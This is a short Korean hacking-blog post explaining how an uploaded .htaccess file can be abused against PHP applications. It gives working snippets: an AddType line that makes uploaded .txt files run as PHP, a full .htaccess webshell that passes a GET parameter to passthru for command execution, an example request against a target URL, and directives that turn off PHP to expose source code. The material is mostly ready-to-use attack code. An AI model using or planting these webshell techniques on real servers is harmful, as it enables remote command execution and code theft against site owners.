php webshell
- .htaccess 를 활용한 웹쉘 업로드 및 기타 공격 2014.02.09
.htaccess 를 활용한 웹쉘 업로드 및 기타 공격
2014. 2. 9. 02:22
php 어플리케이션에서 .htaccess 를 이용하면 다양한 공격을 시도할 수 있다.
1) php 확장자가 아닌 다른 어떤 확장자로도 웹쉘 업로드가 가능해진다.(지정 가능)
AddType application/x-httpd-php .txt
위와 같은 .htaccess 를 먼저 업로드 후 webshell.txt 파일 업로드
2) htaccess 자체를 웹쉘로 사용
============================================
<Files ~ "^\.ht">
Order allow, deny
Allow from all
</Files>
interpreted
AddType application/x-httpd-php .htaccess
<?php
echo
"\n"
;
passthru
(
$_GET
[
'c'
].
" 2>&1"
); ?>
http://www.attack1234.co.kr/.htaccess?c=ls
============================================
출처 : http://www.justanotherhacker.com/2011/05/htaccess-based-attacks.html
3) php 엔진을 꺼버리면 php 소스를 모두 열람할수도 있다.
php_flag engine off
AddType text/plain php
4) 악성코드 페이지로 리다이렉트 등
'Web Hacking' 카테고리의 다른 글
Naver XSS 제보 (4) | 2014.03.14 |
---|---|
lpad , conv 를 이용한 BlindSQL Injection (1) | 2014.02.11 |
mysql 우회 기법 정리 (0) | 2014.02.05 |
SQL Injection(MySQL) - procedure analyze() (2) | 2014.02.04 |
magic_qoutes_gpc() 우회 / getenv() 로 값을 가져올때의 SQL Injection (0) | 2014.02.03 |